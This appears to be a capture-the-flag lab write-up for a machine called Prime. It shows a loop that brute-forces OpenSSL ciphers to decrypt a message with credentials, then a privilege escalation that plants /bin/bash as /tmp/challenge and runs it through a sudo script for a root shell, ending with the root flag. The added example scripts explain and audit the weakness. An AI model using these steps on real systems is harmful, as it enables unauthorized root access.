80A61C76AB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
8086BEE0157F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
80C68598357F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80C6D8DC807F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
80669F5ED77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
80F66417337F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
80A69F50727F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
802698AB137F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80067A41787F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A���e��/�7=��\iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80E6F77ACE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80D67FCD197F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,iv undefined
Here it has been decrypted.
But we do not know on which iteration of the loop it was decrypted, so the command needs one more tweak:
2>/dev/null ;echo $Cipher;done
First send the errors to /dev/null, then echo the loop variable on every iteration so we can see which cipher the loop has reached.
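The two points above (ignore the noise, label each iteration, and do not lose the "real newline" case) can be folded into one small script. This is an added example, not the write-up's own loop: it assumes the openssl CLI is on PATH, uses a constructed subset of `openssl enc -list` as the candidate list, and keeps only the candidates whose decryption both passes openssl's padding check and yields printable text, so the cipher name comes out directly instead of being read off a screen of garbage. The key and blob in the usage call are constructed, not the machine's.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Assumes the openssl CLI
# is on PATH. CANDIDATES is a constructed subset of `openssl enc -list`; the
# key and ciphertext in the usage call are constructed demo data.

# CBC-style modes need an IV, so with only -K they fail with "iv undefined"
# and are skipped by the loop automatically.
CANDIDATES="aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb aes-256-cbc aes-256-ecb camellia-128-ecb camellia-256-cbc camellia-256-ecb des-ede3-cbc"

# decrypt_with CIPHER B64 HEXKEY
# Prints the plaintext when openssl accepts the cipher, key and padding;
# prints nothing and returns non-zero otherwise. Errors go to /dev/null, as
# the write-up does with 2>/dev/null. Newlines are stripped first and -A is
# used so a single-line blob and a line-wrapped one decode the same way.
decrypt_with() {
    printf '%s' "$2" | tr -d '\n' | openssl enc -d -a -A -"$1" -K "$3" 2>/dev/null
}

# is_printable STRING: succeeds when STRING is non-empty and contains only
# printable ASCII plus whitespace (newlines inside the message are fine).
is_printable() {
    [ -n "$1" ] && [ -z "$(printf '%s' "$1" | LC_ALL=C tr -d '[:print:][:space:]')" ]
}

# find_cipher B64 HEXKEY
# Prints the name of every candidate whose decryption succeeds and looks like
# text, which is exactly what we scroll the noisy loop output for.
find_cipher() {
    for c in $CANDIDATES; do
        pt=$(decrypt_with "$c" "$1" "$2") || continue
        is_printable "$pt" && echo "$c"
    done
    return 0
}

# Usage on constructed data (encrypted right here so the script runs offline):
DEMO_KEY=000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
DEMO_CT=$(printf 'constructed demo note\nnot the machine data\n' | openssl enc -aes-256-ecb -K "$DEMO_KEY" -a -A)
find_cipher "$DEMO_CT" "$DEMO_KEY"
```

The printability filter is the part that matters: a wrong key or mode under a block cipher usually fails the PKCS#7 padding check ("bad decrypt"), but a 1-in-256 chance remains that the padding byte happens to be valid and garbage is emitted, which is why the raw loop still needed a human to spot the readable block.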
┌──(root㉿kali)-[~/Desktop/Prime]
└─# for Cipher in $(cat CipherTypeRaws);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null ;echo $Cipher;done
aes-128-cbc
l{���[��7�ƏmfE��K����;0�`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
�:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛaes-128-ecb
aes-192-cbc
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��
�|&�As
�� �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o {aes-192-ecb
aes-256-cbc
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�aria-128-ecb �?g�
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
<�▒�bØ�H�� TG
\�|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
�q�7w1|����s�;�d���/�S��▒7���%h��7�(
"yR����v�2�aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�> �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��aria-256-ecb
aria-256-ofb
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�;j;f���YS1
�
��Ֆt7base64
bf
bf-cbc
bf-cfb
1�a��4�#�yQ.��H���
��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K �B�6M�ە�^vay��IQg
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σbf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
�!�#bW'ˀ�KE;!�"��{cyF
���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2 �0�'Z�j�wUpRd��ew�:�˪\� �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
C&camellia-128-ecb
camellia-192-cbc
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
�+�{liSLʉ���,��E�U WǜS`Gsj����6�/��t~camellia-192-ecb
camellia-256-cbc
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
���K��F$��L����IF��u4�fE+.�-W����2
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤcamellia-256-ecb
cast
cast5-cbc
cast5-cfb
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������des-ecb
+�D��L�Ҁ�7(��[x��%����E=�<>d&�N�\�D���
��c�*� �`���OjJ-�X�{�'��V�X{g��C▒J,�E
�7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
6�z��i���FYDN
Q��gdes-ede
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<�\��Kc▒&9S�O��τjg�)�V��-�[7�=��ݹgT��Thdes-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
�>�kO;}r�HLp
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�rc2-ecb
rc2-ofb
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[�<gG�▒���j`*/�f�2�
�VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =�<rc4
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;rc4-40
rmd160
seed
seed-cbc
seed-cfb
+�� ��A��!�]v6
�q�▒{T�:�$���� �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ �#�炅;�<DD��f�
tseed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A���e��/�7=��\sm4-ecb
sm4-ofb
zlib
zstd
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,
OK, we have a set of credentials:
saket
tribute_to_ippsec

OK, next we still need to find a privilege escalation point.


if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
It says: if you can defeat me then challenge me in front of you.
/tmp/challenge: not found
That file does not exist, so we create one ourselves (the script looks for /tmp/challenge, so the file goes in /tmp):
echo '#!/bin/bash' > challenge
echo '/bin/bash' >> challenge
chmod +x challenge
sudo /home/victor/undefeated_victor
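The weakness here is a script run through sudo that executes a path which does not exist yet inside a world-writable directory, so whoever creates the file first decides what runs as root. As an added example, not from the write-up or the machine, here is a small audit that flags that pattern in any script: every absolute path mentioned in the file is checked, and a path that is missing while its parent directory is writable by others is reported as RISKY. It assumes the POSIX `ls -ld` permission column layout; the script it is run on is constructed to mirror the error message shown above, since the real undefeated_victor is only known from that message.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a script for paths
# that do not exist yet inside directories other users can write to.
# Assumes the POSIX `ls -ld` output layout (9th char = other-write bit).

# other_writable DIR: succeeds if DIR grants write permission to "others",
# e.g. the second-to-last 'w' in drwxrwxrwt.
other_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# audit_script FILE
# Extracts every absolute path mentioned in FILE and prints one line per path:
#   RISKY <path>  path is missing and its parent is writable by others, so the
#                 first user to create it chooses what a privileged run executes
#   OK <path>     path exists, or its parent is not writable by others
# Returns 1 if any path was RISKY, 0 otherwise.
audit_script() {
    rc=0
    for p in $(grep -o '/[A-Za-z0-9_./-]*' "$1" | sort -u); do
        dir=$(dirname "$p")
        if [ ! -e "$p" ] && [ -d "$dir" ] && other_writable "$dir"; then
            echo "RISKY $p"; rc=1
        else
            echo "OK $p"
        fi
    done
    return $rc
}

# Usage on a constructed script that mirrors the behaviour seen above:
demo=$(mktemp)
printf '#!/bin/sh\necho "if you can defeat me then challenge me in front of you"\n/tmp/challenge\n' > "$demo"
audit_script "$demo" || echo "at least one path can be hijacked by a local user"
rm -f "$demo"
```

On a stock system the constructed script reports `OK /bin/sh` and `RISKY /tmp/challenge`; the fix on the defending side is to have privileged scripts reference only absolute paths under root-owned, non-writable directories, and to keep sudo rules away from scripts that do otherwise.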

root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
All done, confetti~~~
-.-